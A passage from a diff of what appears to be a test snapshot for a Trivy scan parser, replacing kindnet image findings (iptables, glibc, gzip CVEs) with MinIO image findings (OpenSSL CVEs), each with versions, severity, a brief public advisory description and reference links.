"https://www.openwall.com/lists/oss-security/2022/04/07/8", - ], - }, - "category": "Vulnerability", - "description": "An arbitrary file write vulnerability was found in GNU gzip's zgrep utility. When zgrep is applied on the attacker's chosen file name (for example, a crafted file name), this can overwrite an attacker's content to an arbitrary attacker-selected file. This flaw occurs due to insufficient validation when processing filenames with two or more newlines where selected content and the target file names are embedded in crafted multi-line file names. This flaw allows a remote, low privileged attacker to force zgrep to write arbitrary files on the system.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "arbitrary-file-write vulnerability", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-1271", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164492", }, { "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2022:4940", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164494", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-1271", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164497", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2073310", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164499", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2073310", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164500", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1271", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4203", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2022-4940.html", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4304", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2022:4940", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4450", }, { "type": "URL", - "value": "https://git.tukaani.org/?p=xz.git;a=commit;h=69d1b3fc29677af8ade8dc15dba83f0589cb63d6", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0215", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-1271.html", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0216", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2022-5052.html", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0217", }, { "type": "URL", - "value": "https://lists.gnu.org/r/bug-gzip/2022-04/msg00011.html", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0286", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-1271", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0401", }, { "type": "URL", - "value": "https://security-tracker.debian.org/tracker/CVE-2022-1271", + "value": "https://errata.almalinux.org/9/ALSA-2023-2165.html", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202209-01", + "value": "https://errata.rockylinux.org/RLSA-2023:0946", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20220930-0006/", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=8818064ce3c3c0f1b740a5aaba2a987e75bfbafd", }, { "type": "URL", - "value": "https://tukaani.org/xz/xzgrep-ZDI-CAN-16587.patch", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=9816136fe31d92ace4037d5da5257f763aeeb4eb", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5378-1", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=c3829dd8825c654652201e16f8a0a0c46ee3f344", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5378-2", + "value": "https://github.com/advisories/GHSA-r7jw-wp68-3xch", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5378-3", + "value": "https://linux.oracle.com/cve/CVE-2023-0215.html", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5378-4", + "value": "https://linux.oracle.com/errata/ELSA-2023-2932.html", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-1271", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-0215", }, { "type": "URL", - "value": "https://www.openwall.com/lists/oss-security/2022/04/07/8", + "value": "https://rustsec.org/advisories/RUSTSEC-2023-0009.html", + }, + { + "type": "URL", + "value": "https://security.netapp.com/advisory/ntap-20230427-0007/", + }, + { + "type": "URL", + "value": "https://security.netapp.com/advisory/ntap-20230427-0009/", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-5844-1", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-5845-1", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-5845-2", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2023-0215", + }, + { + "type": "URL", + "value": "https://www.openssl.org/news/secadv/20230207.txt", }, ], "severity": "HIGH", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2012-2663", - "installedVersion": "1.8.5-3~bpo10+1", - "packageName": "iptables", + "fixedVersion": "1.1.1n-0+deb11u4", + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2023-0286", + "installedVersion": "1.1.1n-0+deb11u3", + "packageName": "libssl1.1", "references": [ - "http://www.spinics.net/lists/netfilter-devel/msg21248.html", - "https://access.redhat.com/security/cve/CVE-2012-2663", - "https://bugzilla.redhat.com/show_bug.cgi?id=826702", - "https://nvd.nist.gov/vuln/detail/CVE-2012-2663", - "https://www.cve.org/CVERecord?id=CVE-2012-2663", + "https://access.redhat.com/errata/RHSA-2023:2165", + "https://access.redhat.com/security/cve/CVE-2023-0286", + "https://access.redhat.com/security/cve/cve-2023-0286", + "https://bugzilla.redhat.com/1960321", + "https://bugzilla.redhat.com/2164440", + "https://bugzilla.redhat.com/2164487", + "https://bugzilla.redhat.com/2164492", + "https://bugzilla.redhat.com/2164494", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144000", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144003", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144006", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144008", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144010", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144012", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144015", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144017", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144019", + "https://bugzilla.redhat.com/show_bug.cgi?id=2145170", + "https://bugzilla.redhat.com/show_bug.cgi?id=2158412", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164440", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164487", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164488", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164492", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164494", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164497", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164499", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164500", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4203", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4304", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4450", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0215", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0216", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0217", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0286", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0401", + "https://errata.almalinux.org/9/ALSA-2023-2165.html", + "https://errata.rockylinux.org/RLSA-2023:0946", + "https://ftp.openbsd.org/pub/OpenBSD/LibreSSL/libressl-3.6.2-relnotes.txt", + "https://ftp.openbsd.org/pub/OpenBSD/patches/7.2/common/018_x509.patch.sig", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2c6c9d439b484e1ba9830d8454a34fa4f80fdfe9", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2f7530077e0ef79d98718138716bc51ca0cad658", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=fd2af07dc083a350c959147097003a14a5e8ac4d", + "https://github.com/advisories/GHSA-x4qr-2fvf-3mr5", + "https://github.com/pyca/cryptography/security/advisories/GHSA-x4qr-2fvf-3mr5", + "https://linux.oracle.com/cve/CVE-2023-0286.html", + "https://linux.oracle.com/errata/ELSA-2023-2932.html", + "https://nvd.nist.gov/vuln/detail/CVE-2023-0286", + "https://rustsec.org/advisories/RUSTSEC-2023-0006.html", + "https://ubuntu.com/security/notices/USN-5844-1", + "https://ubuntu.com/security/notices/USN-5845-1", + "https://ubuntu.com/security/notices/USN-5845-2", + "https://www.cve.org/CVERecord?id=CVE-2023-0286", + "https://www.openssl.org/news/secadv/20230207.txt", ], }, "category": "Vulnerability", - "description": "extensions/libxt_tcp.c in iptables through 1.4.21 does not match TCP SYN+FIN packets in --syn rules, which might allow remote attackers to bypass intended firewall restrictions via crafted packets. NOTE: the CVE-2012-6638 fix makes this issue less relevant.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "description": "There is a type confusion vulnerability relating to X.400 address processing inside an X.509 GeneralName. X.400 addresses were parsed as an ASN1_STRING but the public structure definition for GENERAL_NAME incorrectly specified the type of the x400Address field as ASN1_TYPE. This field is subsequently interpreted by the OpenSSL function GENERAL_NAME_cmp as an ASN1_TYPE rather than an ASN1_STRING. When CRL checking is enabled (i.e. the application sets the X509_V_FLAG_CRL_CHECK flag), this vulnerability may allow an attacker to pass arbitrary pointers to a memcmp call, enabling them to read memory contents or enact a denial of service. In most cases, the attack requires the attacker to provide both the certificate chain and CRL, neither of which need to have a valid signature. If the attacker only controls one of these inputs, the other input must already contain an X.400 address as a CRL distribution point, which is uncommon. As such, this vulnerability is most likely to only affect applications which have implemented their own functionality for retrieving CRLs over a network.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, - "name": "iptables: --syn flag bypass", + "name": "X.400 address type confusion in X.509 GeneralName", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2012-2663", + "value": "https://avd.aquasec.com/nvd/cve-2023-0286", }, { "type": "URL", - "value": "http://www.spinics.net/lists/netfilter-devel/msg21248.html", + "value": "https://access.redhat.com/errata/RHSA-2023:2165", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2012-2663", + "value": "https://access.redhat.com/security/cve/CVE-2023-0286", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=826702", + "value": "https://access.redhat.com/security/cve/cve-2023-0286", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2012-2663", + "value": "https://bugzilla.redhat.com/1960321", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2012-2663", + "value": "https://bugzilla.redhat.com/2164440", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2019-11360", - "installedVersion": "1.8.5-3~bpo10+1", - "packageName": "iptables", - "references": [ - "https://0day.work/cve-2019-11360-bufferoverflow-in-iptables-restore-v1-8-2/", - "https://access.redhat.com/security/cve/CVE-2019-11360", - "https://git.netfilter.org/iptables/commit/iptables/xshared.c?id=2ae1099a42e6a0f06de305ca13a842ac83d4683e", - "https://nvd.nist.gov/vuln/detail/CVE-2019-11360", - "https://www.cve.org/CVERecord?id=CVE-2019-11360", - ], - }, - "category": "Vulnerability", - "description": "A buffer overflow in iptables-restore in netfilter iptables 1.8.2 allows an attacker to (at least) crash the program or potentially gain code execution via a specially crafted iptables-save file. This is related to add_param_to_argv in xshared.c.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "iptables: buffer overflow in iptables-restore", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2019-11360", + "value": "https://bugzilla.redhat.com/2164487", }, { "type": "URL", - "value": "https://0day.work/cve-2019-11360-bufferoverflow-in-iptables-restore-v1-8-2/", + "value": "https://bugzilla.redhat.com/2164492", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2019-11360", + "value": "https://bugzilla.redhat.com/2164494", }, { "type": "URL", - "value": "https://git.netfilter.org/iptables/commit/iptables/xshared.c?id=2ae1099a42e6a0f06de305ca13a842ac83d4683e", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144000", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-11360", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144003", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2019-11360", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144006", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2011-3374", - "installedVersion": "1.8.2.2", - "packageName": "libapt-pkg5.0", - "references": [ - "https://access.redhat.com/security/cve/cve-2011-3374", - "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=642480", - "https://people.canonical.com/~ubuntu-security/cve/2011/CVE-2011-3374.html", - "https://seclists.org/fulldisclosure/2011/Sep/221", - "https://security-tracker.debian.org/tracker/CVE-2011-3374", - "https://snyk.io/vuln/SNYK-LINUX-APT-116518", - "https://ubuntu.com/security/CVE-2011-3374", - ], - }, - "category": "Vulnerability", - "description": "It was found that apt-key in apt, all versions, do not correctly validate gpg keys with the master keyring, leading to a potential man-in-the-middle attack.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "It was found that apt-key in apt, all versions, do not correctly valid ...", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2011-3374", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144008", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/cve-2011-3374", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144010", }, { "type": "URL", - "value": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=642480", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144012", }, { "type": "URL", - "value": "https://people.canonical.com/~ubuntu-security/cve/2011/CVE-2011-3374.html", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144015", }, { "type": "URL", - "value": "https://seclists.org/fulldisclosure/2011/Sep/221", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144017", }, { "type": "URL", - "value": "https://security-tracker.debian.org/tracker/CVE-2011-3374", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144019", }, { "type": "URL", - "value": "https://snyk.io/vuln/SNYK-LINUX-APT-116518", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2145170", }, { "type": "URL", - "value": "https://ubuntu.com/security/CVE-2011-3374", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2158412", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": "1.0.6-9.2~deb10u2", - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "DLA-3112-1", - "installedVersion": "1.0.6-9.2~deb10u1", - "packageName": "libbz2-1.0", - "references": undefined, - }, - "category": "Vulnerability", - "description": undefined, - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "bzip2 - bugfix update", - "references": [], - "severity": "INFORMATIONAL", - }, - { - "attributes": { - "fixedVersion": "2.28-10+deb10u2", - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2021-33574", - "installedVersion": "2.28-10", - "packageName": "libc-bin", - "references": [ - "https://access.redhat.com/security/cve/CVE-2021-33574", - "https://linux.oracle.com/cve/CVE-2021-33574.html", - "https://linux.oracle.com/errata/ELSA-2021-9560.html", - "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/KJYYIMDDYOHTP2PORLABTOHYQYYREZDD/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RBUUWUGXVILQXVWEOU7N42ICHPJNAEUP/", - "https://nvd.nist.gov/vuln/detail/CVE-2021-33574", - "https://security.gentoo.org/glsa/202107-07", - "https://security.netapp.com/advisory/ntap-20210629-0005/", - "https://sourceware.org/bugzilla/show_bug.cgi?id=27896", - "https://sourceware.org/bugzilla/show_bug.cgi?id=27896#c1", - "https://www.cve.org/CVERecord?id=CVE-2021-33574", - ], - }, - "category": "Vulnerability", - "description": "The mq_notify function in the GNU C Library (aka glibc) versions 2.32 and 2.33 has a use-after-free. It may use the notification thread attributes object (passed through its struct sigevent parameter) after it has been freed by the caller, leading to a denial of service (application crash) or possibly unspecified other impact.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "glibc: mq_notify does not handle separately allocated thread attributes", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-33574", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164440", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-33574", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164487", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2021-33574.html", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164488", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2021-9560.html", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164492", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164494", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/KJYYIMDDYOHTP2PORLABTOHYQYYREZDD/", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164497", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RBUUWUGXVILQXVWEOU7N42ICHPJNAEUP/", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164499", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-33574", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164500", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202107-07", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4203", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20210629-0005/", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4304", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=27896", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4450", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=27896#c1", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0215", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-33574", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0216", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": "2.28-10+deb10u2", - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2021-35942", - "installedVersion": "2.28-10", - "packageName": "libc-bin", - "references": [ - "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-35942.json", - "https://access.redhat.com/security/cve/CVE-2021-35942", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-35942", - "https://linux.oracle.com/cve/CVE-2021-35942.html", - "https://linux.oracle.com/errata/ELSA-2021-9560.html", - "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", - "https://nvd.nist.gov/vuln/detail/CVE-2021-35942", - "https://security.gentoo.org/glsa/202208-24", - "https://security.netapp.com/advisory/ntap-20210827-0005/", - "https://sourceware.org/bugzilla/show_bug.cgi?id=28011", - "https://sourceware.org/git/?p=glibc.git;a=commit;h=5adda61f62b77384718b4c0d8336ade8f2b4b35c", - "https://sourceware.org/glibc/wiki/Security%20Exceptions", - "https://ubuntu.com/security/notices/USN-5310-1", - "https://ubuntu.com/security/notices/USN-5699-1", - "https://www.cve.org/CVERecord?id=CVE-2021-35942", - ], - }, - "category": "Vulnerability", - "description": "The wordexp function in the GNU C Library (aka glibc) through 2.33 may crash or read arbitrary memory in parse_param (in posix/wordexp.c) when called with an untrusted, crafted pattern, potentially resulting in a denial of service or disclosure of information. This occurs because atoi was used but strtoul should have been used to ensure correct calculations.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "glibc: Arbitrary read in wordexp()", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-35942", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0217", }, { "type": "URL", - "value": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-35942.json", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0286", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-35942", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0401", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-35942", + "value": "https://errata.almalinux.org/9/ALSA-2023-2165.html", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2021-35942.html", + "value": "https://errata.rockylinux.org/RLSA-2023:0946", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2021-9560.html", + "value": "https://ftp.openbsd.org/pub/OpenBSD/LibreSSL/libressl-3.6.2-relnotes.txt", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", + "value": "https://ftp.openbsd.org/pub/OpenBSD/patches/7.2/common/018_x509.patch.sig", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-35942", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2c6c9d439b484e1ba9830d8454a34fa4f80fdfe9", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202208-24", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2f7530077e0ef79d98718138716bc51ca0cad658", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20210827-0005/", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=fd2af07dc083a350c959147097003a14a5e8ac4d", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=28011", + "value": "https://github.com/advisories/GHSA-x4qr-2fvf-3mr5", }, { "type": "URL", - "value": "https://sourceware.org/git/?p=glibc.git;a=commit;h=5adda61f62b77384718b4c0d8336ade8f2b4b35c", + "value": "https://github.com/pyca/cryptography/security/advisories/GHSA-x4qr-2fvf-3mr5", }, { "type": "URL", - "value": "https://sourceware.org/glibc/wiki/Security%20Exceptions", + "value": "https://linux.oracle.com/cve/CVE-2023-0286.html", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5310-1", + "value": "https://linux.oracle.com/errata/ELSA-2023-2932.html", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5699-1", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-0286", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-35942", + "value": "https://rustsec.org/advisories/RUSTSEC-2023-0006.html", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-5844-1", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-5845-1", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-5845-2", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2023-0286", + }, + { + "type": "URL", + "value": "https://www.openssl.org/news/secadv/20230207.txt", }, ], "severity": "HIGH", }, { "attributes": { - "fixedVersion": "2.28-10+deb10u2", - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-23218", - "installedVersion": "2.28-10", - "packageName": "libc-bin", + "fixedVersion": "1.1.1n-0+deb11u5", + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2023-0464", + "installedVersion": "1.1.1n-0+deb11u3", + "packageName": "libssl1.1", "references": [ - "https://access.redhat.com/security/cve/CVE-2022-23218", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-23218", - "https://linux.oracle.com/cve/CVE-2022-23218.html", - "https://linux.oracle.com/errata/ELSA-2022-9421.html", - "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", - "https://nvd.nist.gov/vuln/detail/CVE-2022-23218", - "https://security.gentoo.org/glsa/202208-24", - "https://sourceware.org/bugzilla/show_bug.cgi?id=28768", - "https://ubuntu.com/security/notices/USN-5310-1", - "https://ubuntu.com/security/notices/USN-5310-2", - "https://www.cve.org/CVERecord?id=CVE-2022-23218", - "https://www.oracle.com/security-alerts/cpujul2022.html", + "https://access.redhat.com/security/cve/CVE-2023-0464", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0464", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2017771e2db3e2b96f89bbe8766c3209f6a99545", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2dcd4f1e3115f38cefa43e3efbe9b801c27e642e", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=879f7080d7e141f415c79eaa3a8ac4a3dad0348b", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=959c59c7a0164117e7f8366466a32bb1f8d77ff1", + "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", + "https://nvd.nist.gov/vuln/detail/CVE-2023-0464", + "https://ubuntu.com/security/notices/USN-6039-1", + "https://www.cve.org/CVERecord?id=CVE-2023-0464", + "https://www.debian.org/security/2023/dsa-5417", + "https://www.openssl.org/news/secadv/20230322.txt", ], }, "category": "Vulnerability", - "description": "The deprecated compatibility function svcunix_create in the sunrpc module of the GNU C Library (aka glibc) through 2.34 copies its path argument on the stack without validating its length, which may result in a buffer overflow, potentially resulting in a denial of service or (if an application is not built with a stack protector enabled) arbitrary code execution.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "description": +"A security vulnerability has been identified in all supported versions + +of OpenSSL related to the verification of X.509 certificate chains +that include policy constraints. Attackers may be able to exploit this +vulnerability by creating a malicious certificate chain that triggers +exponential use of computational resources, leading to a denial-of-service +(DoS) attack on affected systems. + +Policy processing is disabled by default but can be enabled by passing +the \`-policy' argument to the command line utilities or by calling the +\`X509_VERIFY_PARAM_set1_policies()' function." +, + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, - "name": "glibc: Stack-based buffer overflow in svcunix_create via long pathnames", + "name": "Denial of service by excessive resource usage in verifying X509 policy constraints", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-23218", + "value": "https://avd.aquasec.com/nvd/cve-2023-0464", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-23218", + "value": "https://access.redhat.com/security/cve/CVE-2023-0464", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-23218", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0464", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-23218.html", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2017771e2db3e2b96f89bbe8766c3209f6a99545", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2022-9421.html", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2dcd4f1e3115f38cefa43e3efbe9b801c27e642e", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=879f7080d7e141f415c79eaa3a8ac4a3dad0348b", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-23218", + "value": 